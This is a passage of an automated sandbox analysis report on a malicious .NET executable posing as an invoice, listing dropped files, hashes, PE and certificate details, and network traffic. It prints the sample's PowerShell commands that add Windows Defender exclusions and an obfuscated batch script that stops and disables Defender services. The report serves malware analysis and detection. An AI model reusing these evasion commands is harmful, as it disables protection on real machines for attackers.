                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8399
                                                                                                              Entropy (8bit):4.665734428420432
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                              MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                              SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                              SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                              SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                              Malicious:false
                                                                                                              Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8
                                                                                                              Entropy (8bit):2.75
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Z7yM:F3
                                                                                                              MD5:C987B59C76EA2E8854B59456910A97A9
                                                                                                              SHA1:9C9B6CDCD12E0CD3CDDBC36A37CCCFB39084A0D7
                                                                                                              SHA-256:5B957D5A9AF25F06775FD1CF60B3A0BA352AFF046C25909B1048F39D20A82BE5
                                                                                                              SHA-512:F411FD12E999D64BBAEF9C45C572A194EBE304E3BB8446CDAE95C3630514D01E08405A9D1FDB4D014E307F5B57DA9B5802AC93BD55E5D4251D88B5D2BBC0C9C9
                                                                                                              Malicious:true
                                                                                                              Preview: .......H
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.KMuPlgZO.20210225151021.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5885
                                                                                                              Entropy (8bit):5.426114680347712
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZzjJNCqDo1Z8ZBjJNCqDo1ZEFHdjZejJNCqDo1ZiYttjZw:e
                                                                                                              MD5:794F27F33C57215E93933ABBD7D08078
                                                                                                              SHA1:EBCBD871DAE78BBEF57836C8E88B6FC8E5F6832C
                                                                                                              SHA-256:CF3BA8F7E0711BD501934E46A2CC4948B734AB0AEAC8D14E934026DF9C9F9239
                                                                                                              SHA-512:8C93F913D52347F045B7B817C7AF7F5D571548A50A1E7E0A8B9C7CD04F286BA135BE637A34D8CF8660D70A54629B6A835B2C6F8495315C74150D26C084498516
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151046..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..Process ID: 3400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151046..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151413..Username: DESKTOP
                                                                                                              C:\Users\user\Documents\20210225\PowerShell_transcript.367706.M_cQjc0Y.20210225151010.txt
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5869
                                                                                                              Entropy (8bit):5.381608150850337
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:BZcjJNfDqDo1Z44ZgjJNfDqDo1ZwLg9gzgjZDjJNfDqDo1ZlcgDgDgRZu:y
                                                                                                              MD5:5733AEE55EEC4C977793BA763910861B
                                                                                                              SHA1:655C9B8408D1AED016AB0839E38FD46C7EAEAE34
                                                                                                              SHA-256:A52FDE98308C1EB3306470F1E69566363B015D744404B731D4B5B9464F0C2827
                                                                                                              SHA-512:FDC520CEE5CFA132AFB8898074C6FBD92B500FFED012418F3D807DDE0744DC316F32FD6A50ED567FB1CE805272AF97607DE8F93A410D895C708FEB197F9277D5
                                                                                                              Malicious:false
                                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210225151023..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 367706 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..Process ID: 1472..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210225151023..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210225151359..Username: computer
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):38008
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              MD5:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              SHA1:320DEA63289CAD5685CFBA395D673142F85FC6FF
                                                                                                              SHA-256:6E67B342328C550BEAD9BF5A953ABBB12085AEDB4A7A625C242B5474E71A5DB8
                                                                                                              SHA-512:73D4C3830287C6E7B33DE1ED8A2A8DAA104FA90399600B7189B2499E4259436F684E0362215A8783A5E4093EFFDA313DA8748986FF9D272E59AA72AEBEDDE22D
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 28%
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x.............. ........@.. ....................................@.....................................W.......................x............................................................ ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........3...b...........................................................*..(....*..(....*~s!........s"........s?........*BsZ...oY...o#...*.r.9.p(.....(....r.9.p(....s3...&*....0..........r...pr...p~....o....r...pr...p~....o....~....o....r...pr$..p~....o....r,..pr8..p~....o....~....o....~....o.....s......%r@..pr...p~....o....r...pr...p~....o....~....o....r...pr...p~....o....r...pr...p~....o....~....o....~....o....o....%r...pr&..p~....o....r...pr:..p~....o....~....o....rB..prV
                                                                                                              C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe:Zone.Identifier
                                                                                                              Process:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview: [ZoneTransfer]....ZoneId=0

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.377385288397735
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              File size:38008
                                                                                                              MD5:a0f103f98ede4da72e178ee05dabe1e1
                                                                                                              SHA1:320dea63289cad5685cfba395d673142f85fc6ff
                                                                                                              SHA256:6e67b342328c550bead9bf5a953abbb12085aedb4a7a625c242b5474e71a5db8
                                                                                                              SHA512:73d4c3830287c6e7b33de1ed8a2a8daa104fa90399600b7189b2499e4259436f684e0362215a8783a5e4093effda313da8748986ff9d272e59aa72aebedde22d
                                                                                                              SSDEEP:768:aW5bfD3mDeQTC2DYUlllllll9lllllll4l28KhJpsFPh:aW1f7ceQTpYUlllllll9lllllll4l28X
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`*A..........."...0..x............... ........@.. ....................................@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x4096ee
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:true
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Authenticode Signature

                                                                                                              Signature Valid:false
                                                                                                              Signature Issuer:C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                              Error Number:-2146762487
                                                                                                              Not Before, Not After
                                                                                                              • 2/24/2021 8:31:21 PM 2/24/2022 8:31:21 PM
                                                                                                              Subject Chain
                                                                                                              • C=RhsegNsnuaMnFSzJSHbIMUy, S=TKbvMpnoPECEDjKPKWAtEZlmGBoanUWBiq, L=SuAScGBkEoSjbkzCECcq, T=NJNtgcwcBCTwFxamfGPkUCjlPDafjQAyKqkMxBelHK, E=vlUlodNtWupIeCwKVItV, OU=IDJQtxsheIbYaBRvwyZSeoHWgFemeHGAvgelX, O=vivVuRAzZUKNM, CN=HAkjSMPHlEsE
                                                                                                              Version:3
                                                                                                              Thumbprint MD5:EF28D8EF5540C2DDF8982021C060330B
                                                                                                              Thumbprint SHA-1:3FB51DB8532A75A759CC58FCAC48F75BC950A343
                                                                                                              Thumbprint SHA-256:ED4807C63650641F009FDC3D82D1A3A58C8D6EEA22E655FD1970962F803188EB
                                                                                                              Serial:5FF50A8B939E7010528F8FA57C8DC691

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x96940x57.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x3e0.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x80000x1478.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x76f40x7800False0.374055989583data4.93746742515IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0xa0000x3e00x400False0.46875data3.52295456663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_VERSION0xa0580x388dataEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              LegalCopyrightCopyright 2022 MElPBjWh. All rights reserved.
                                                                                                              Assembly Version0.0.5.0
                                                                                                              InternalNameNbTfoyms.exe
                                                                                                              FileVersion7.5.8.1
                                                                                                              CompanyNameKlNrqpbB
                                                                                                              LegalTrademarksZAYgcLMa
                                                                                                              CommentsSArWMDgi
                                                                                                              ProductNameNbTfoyms
                                                                                                              ProductVersion0.0.5.0
                                                                                                              FileDescriptionGFZIgBqf
                                                                                                              OriginalFilenameNbTfoyms.exe
                                                                                                              Translation0x0409 0x0514

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 25, 2021 15:09:59.456415892 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.511552095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.511753082 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.512818098 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.566689968 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651695013 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651731014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651753902 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651779890 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651803017 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651824951 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651850939 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.651873112 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651896000 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651917934 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651931047 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.651952028 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.651962042 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.652018070 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.653065920 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.653103113 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.653218985 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.654400110 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.654433012 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.654535055 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.655621052 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.655654907 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.655783892 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.656821966 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.656857014 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.656929016 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.658185959 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.658222914 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.658297062 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.659379005 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.659414053 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.659490108 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.660640001 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.660674095 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.660744905 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.661930084 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.661959887 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.662056923 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.663156986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.663189888 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.663286924 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.664402962 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.664441109 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.664530993 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.704585075 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.704626083 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.704747915 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.705084085 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.705111980 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.705363035 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.706449986 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.706486940 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.706554890 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.707669973 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.707705021 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.707782984 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.708934069 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.708967924 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.709079027 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.710192919 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710793972 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710825920 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.710899115 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:09:59.712039948 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.712075949 CET8049722172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:09:59.712130070 CET4972280192.168.2.4172.67.172.17
